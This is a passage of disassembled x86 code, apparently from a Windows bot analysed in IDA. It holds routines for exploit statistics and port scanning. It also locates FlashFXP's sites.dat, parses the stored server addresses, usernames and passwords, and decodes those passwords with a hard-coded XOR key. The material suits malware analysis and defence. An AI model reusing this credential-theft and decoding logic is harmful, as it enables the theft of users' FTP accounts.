push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset sub_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141C1 proc near ; DATA XREF: sub_4142BF+E2�o
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1B2 = dword ptr -1B2h
var_1AE = byte ptr -1AEh
var_16 = byte ptr -16h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push [ebp+var_1B2]
push 0
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41424F
push [ebp+var_8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D028
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: sub_4141C1+56�j
movsx eax, [ebp+var_16]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, [ebp+var_1B2]
jb short loc_41428B
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41CFF0
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: sub_4141C1+A4�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41CFC0
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: sub_4141C1+8C�j
; sub_4141C1+94�j ...
push [ebp+var_2BC]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_4141C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D058
push 0
push [ebp+var_C]
push offset sub_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B0 proc near ; DATA XREF: sub_414600+1D6�o
var_2E8 = qword ptr -2E8h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = byte ptr -2BCh
var_1BC = word ptr -1BCh
var_1BA = word ptr -1BAh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_18 = byte ptr -18h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov ax, [ebp+var_1BC]
mov [ebp+var_C], ax
push [ebp+var_1B4]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41440C
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: sub_4143B0+47�j
push [ebp+var_1B4]
movzx eax, [ebp+var_1BA]
push eax
movzx eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_2BC]
push eax
mov eax, [ebp+var_2C0]
push dword ptr [eax]
push offset dword_41D0C8
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_414458
push 3E8h
call dword_41709C ; Sleep
loc_414458: ; CODE XREF: sub_4143B0+9B�j
call sub_416B64 ; clock
mov [ebp+var_2C4], eax
and [ebp+var_4], 0
loc_414467: ; CODE XREF: sub_4143B0+13A�j
; sub_4143B0+1F0�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: sub_4143B0+C1�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: sub_4143B0+D0�j
push 0Ah
lea eax, [ebp+var_2CC]
push eax
movzx eax, [ebp+var_C]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+var_8]
push 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_2D0], eax
mov ax, [ebp+var_C]
add ax, 1
mov [ebp+var_C], ax
cmp [ebp+var_2D0], 0
jz short loc_4144EF
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: sub_4143B0+129�j
; sub_4143B0+138�j
push [ebp+var_1B8]
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: sub_4143B0+1E2�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: sub_4143B0+166�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_2D8], eax
cmp [ebp+var_2D8], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4143B0+180�j
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2D8]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov al, [ebp+var_18]
mov [ebp+var_2D4], al
and [ebp+var_18], 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
push offset dword_41D0B4
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_2D4]
mov [ebp+var_18], al
push 3E8h
call dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: sub_4143B0+156�j
; sub_4143B0+168�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: sub_4143B0:loc_414482�j
push [ebp+var_4]
call sub_416B64 ; clock
sub eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
fild [ebp+var_2DC]
fdiv flt_417270
push ecx
push ecx
fstp [esp+2E8h+var_2E8]
lea eax, [ebp+var_2BC]
push eax
push offset unk_41D078
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 18h
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: sub_4143B0+57�j
leave
retn 4
sub_4143B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D110
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: sub_414A1E+373�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: sub_414A1E+30�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A1E proc near ; DATA XREF: sub_414EB0+35�o
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_544 = byte ptr -544h
var_4C4 = byte ptr -4C4h
var_444 = byte ptr -444h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = byte ptr -3B4h
var_334 = dword ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_190 = byte ptr -190h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_180]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: sub_414A1E+38�j
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D2E0
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_184], 0
and [ebp+var_334], 0
mov al, [ebp+var_190]
mov [ebp+var_330], al
and [ebp+var_190], 0
push offset aRb ; "rb"
lea eax, [ebp+var_180]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_414A1E+AA�j
push 2
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_3C4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_3C0], eax
cmp [ebp+var_3C0], 100000h
jnb short loc_414B0D
mov eax, [ebp+var_3C0]
mov [ebp+var_5E0], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
loc_414B0D: ; CODE XREF: sub_414A1E+DF�j
mov [ebp+var_5E0], 100000h
loc_414B17: ; CODE XREF: sub_414A1E+ED�j
mov eax, [ebp+var_5E0]
mov [ebp+var_3C0], eax
push 0
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp+var_3C0]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_3BC], eax
cmp [ebp+var_3BC], 0
jnz short loc_414B63
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: sub_414A1E+132�j
push [ebp+var_3C4]
push [ebp+var_3C0]
push 1
push [ebp+var_3BC]
call sub_416B90 ; fread
add esp, 10h
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_3BC]
add eax, [ebp+var_3C0]
and byte ptr [eax], 0
mov eax, [ebp+var_3BC]
mov [ebp+var_3B8], eax
loc_414BA6: ; CODE XREF: sub_414A1E+428�j
push offset asc_41D2D8 ; "\r\n\r\n["
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5DC], eax
mov eax, [ebp+var_3B8]
mov [ebp+var_5D0], eax
push offset aIp ; "\r\nIP="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5C8], eax
push offset aPort ; "\r\nPort="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D8], eax
push offset aUser_0 ; "\r\nUser="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5CC], eax
push offset aPass_0 ; "\r\nPass="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D4], eax
cmp [ebp+var_5C8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C52
mov eax, [ebp+var_5C8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C52: ; CODE XREF: sub_414A1E+220�j
cmp [ebp+var_5D8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C7A
mov eax, [ebp+var_5D8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C7A: ; CODE XREF: sub_414A1E+248�j
cmp [ebp+var_5CC], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CA2
mov eax, [ebp+var_5CC]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CA2: ; CODE XREF: sub_414A1E+270�j
cmp [ebp+var_5D4], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CCA
mov eax, [ebp+var_5D4]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CCA: ; CODE XREF: sub_414A1E+298�j
and [ebp+var_4C4], 0
mov al, [ebp+var_4C4]
mov [ebp+var_3B4], al
mov al, [ebp+var_3B4]
mov [ebp+var_5C4], al
mov al, [ebp+var_5C4]
mov [ebp+var_444], al
mov al, [ebp+var_444]
mov [ebp+var_544], al
lea eax, [ebp+var_544]
push eax
push offset asc_41D2AC ; "[%[^]]]\r\n"
push [ebp+var_5D0]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_444]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push [ebp+var_5C8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_5C4]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
push [ebp+var_5D8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3B4]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push [ebp+var_5CC]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_5D4]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_4C4]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: sub_414A1E+37C�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp+var_544]
push eax
lea eax, [ebp+var_5C4]
push eax
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
